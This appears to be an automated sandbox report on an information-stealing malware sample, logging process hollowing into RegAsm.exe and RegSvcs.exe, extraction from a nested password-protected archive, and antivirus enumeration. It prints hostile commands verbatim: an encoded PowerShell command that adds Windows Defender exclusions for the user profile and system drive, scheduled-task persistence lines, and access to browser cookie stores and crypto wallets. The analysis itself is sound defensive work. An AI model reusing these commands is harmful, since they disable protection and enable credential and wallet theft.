                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: Base64 decoded <#sW8Lc#> Add-MpPreference <#VwAw#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#5Rhx#> -Force <#uiup8R#>
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: Base64 decoded <#sW8Lc#> Add-MpPreference <#VwAw#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#5Rhx#> -Force <#uiup8R#>
                  Source: C:\Users\user\Desktop\inject.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
                  Source: C:\Users\user\Desktop\inject.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                  Source: C:\Users\user\Desktop\inject.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000Jump to behavior
                  Source: C:\Users\user\Desktop\inject.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 432000Jump to behavior
                  Source: C:\Users\user\Desktop\inject.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 450000Jump to behavior
                  Source: C:\Users\user\Desktop\inject.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: F7A008Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
                  Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: E9E008
                  Source: C:\Users\user\Desktop\inject.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Users\user\AppData\Local\Temp\conhost.exe "C:\Users\user\AppData\Local\Temp\conhost.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\conhost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mode.com mode 65,10Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e file.zip -p29586644319935208542739921766 -oextractedJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_11.zip -oextractedJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_10.zip -oextractedJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_9.zip -oextractedJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_8.zip -oextractedJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_7.zip -oextractedJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_6.zip -oextractedJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_5.zip -oextractedJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_4.zip -oextractedJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_3.zip -oextractedJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_2.zip -oextractedJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_1.zip -oextractedJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +H "Installer.exe"Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\Installer.exe "Installer.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C powershell -EncodedCommand "PAAjAHMAVwA4AEwAYwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAFYAdwBBAHcAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMANQBSAGgAeAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB1AGkAdQBwADgAUgAjAD4A" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk7625" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "PAAjAHMAVwA4AEwAYwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAFYAdwBBAHcAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMANQBSAGgAeAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB1AGkAdQBwADgAUgAjAD4A"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c powershell -encodedcommand "paajahmavwa4aewaywajad4aiabbagqazaatae0acabqahiazqbmaguacgblag4aywblacaapaajafyadwbbahcaiwa+acaalqbfahgaywbsahuacwbpag8abgbqageadaboacaaqaaoacqazqbuahyaogbvahmazqbyafaacgbvagyaaqbsagualaakaguabgb2adoauwb5ahmadablag0arabyagkadgblackaiaa8acmanqbsaggaeaajad4aiaataeyabwbyagmazqagadwaiwb1agkadqbwadgaugajad4a" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -encodedcommand "paajahmavwa4aewaywajad4aiabbagqazaatae0acabqahiazqbmaguacgblag4aywblacaapaajafyadwbbahcaiwa+acaalqbfahgaywbsahuacwbpag8abgbqageadaboacaaqaaoacqazqbuahyaogbvahmazqbyafaacgbvagyaaqbsagualaakaguabgb2adoauwb5ahmadablag0arabyagkadgblackaiaa8acmanqbsaggaeaajad4aiaataeyabwbyagmazqagadwaiwb1agkadqbwadgaugajad4a"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c powershell -encodedcommand "paajahmavwa4aewaywajad4aiabbagqazaatae0acabqahiazqbmaguacgblag4aywblacaapaajafyadwbbahcaiwa+acaalqbfahgaywbsahuacwbpag8abgbqageadaboacaaqaaoacqazqbuahyaogbvahmazqbyafaacgbvagyaaqbsagualaakaguabgb2adoauwb5ahmadablag0arabyagkadgblackaiaa8acmanqbsaggaeaajad4aiaataeyabwbyagmazqagadwaiwb1agkadqbwadgaugajad4a" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -encodedcommand "paajahmavwa4aewaywajad4aiabbagqazaatae0acabqahiazqbmaguacgblag4aywblacaapaajafyadwbbahcaiwa+acaalqbfahgaywbsahuacwbpag8abgbqageadaboacaaqaaoacqazqbuahyaogbvahmazqbyafaacgbvagyaaqbsagualaakaguabgb2adoauwb5ahmadablag0arabyagkadgblackaiaa8acmanqbsaggaeaajad4aiaataeyabwbyagmazqagadwaiwb1agkadqbwadgaugajad4a"
                  Source: C:\Users\user\AppData\Local\Temp\conhost.exeCode function: 5_2_00402744 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,5_2_00402744
                  Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 9_2_0035D670 cpuid 9_2_0035D670
                  Source: C:\Users\user\AppData\Local\Temp\conhost.exeCode function: GetLastError,GetLastError,wsprintfW,GetEnvironmentVariableW,GetEnvironmentVariableW,GetLastError,??2@YAPAXI@Z,GetEnvironmentVariableW,GetLastError,lstrcmpiW,??3@YAXPAX@Z,??3@YAXPAX@Z,SetLastError,lstrlenA,??2@YAPAXI@Z,GetLocaleInfoW,_wtol,MultiByteToWideChar,5_2_0040247D
                  Source: C:\Users\user\Desktop\inject.exeQueries volume information: C:\Users\user\Desktop\inject.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\conhost.exeCode function: 5_2_004039E7 lstrlenW,GetSystemTimeAsFileTime,GetFileAttributesW,memcpy,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,5_2_004039E7
                  Source: C:\Users\user\AppData\Local\Temp\conhost.exeCode function: 5_2_00405BFC ?_set_new_handler@@YAP6AHI@ZP6AHI@Z@Z,GetVersionExW,GetCommandLineW,lstrlenW,wsprintfW,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetModuleFileNameW,_wtol,??2@YAPAXI@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,wsprintfW,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetCommandLineW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetCurrentProcess,SetProcessWorkingSetSize,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,CoInitialize,lstrlenW,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,GetKeyState,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetFileAttributesW,??3@YAXPAX@Z,??3@YAXPAX@Z,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,SetLastError,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,SetCurrentDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,MessageBoxA,5_2_00405BFC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: RegAsm.exe, 00000003.00000002.2243315419.00000000072B2000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2243157954.000000000728E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: dump.pcap, type: PCAP
                  Source: Yara matchFile source: 0.2.inject.exe.37f5570.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.inject.exe.37f5570.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000003.00000002.2215892910.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2055709662.00000000037F5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: inject.exe PID: 2452, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3724, type: MEMORYSTR
                  Source: RegAsm.exe, 00000003.00000002.2216914083.00000000030A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ElectrumE#
                  Source: RegAsm.exe, 00000003.00000002.2216914083.00000000030A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: JaxxE#
                  Source: RegAsm.exe, 00000003.00000002.2216914083.00000000030A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ExodusE#
                  Source: RegAsm.exe, 00000003.00000002.2216914083.00000000030A8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: EthereumE#
                  Source: powershell.exe, 0000001A.00000002.2313653824.00000000060D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: # AutoUnlockKeyStored. Win32_EncryptableVolume::IsAutoUnlockKeyStored
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
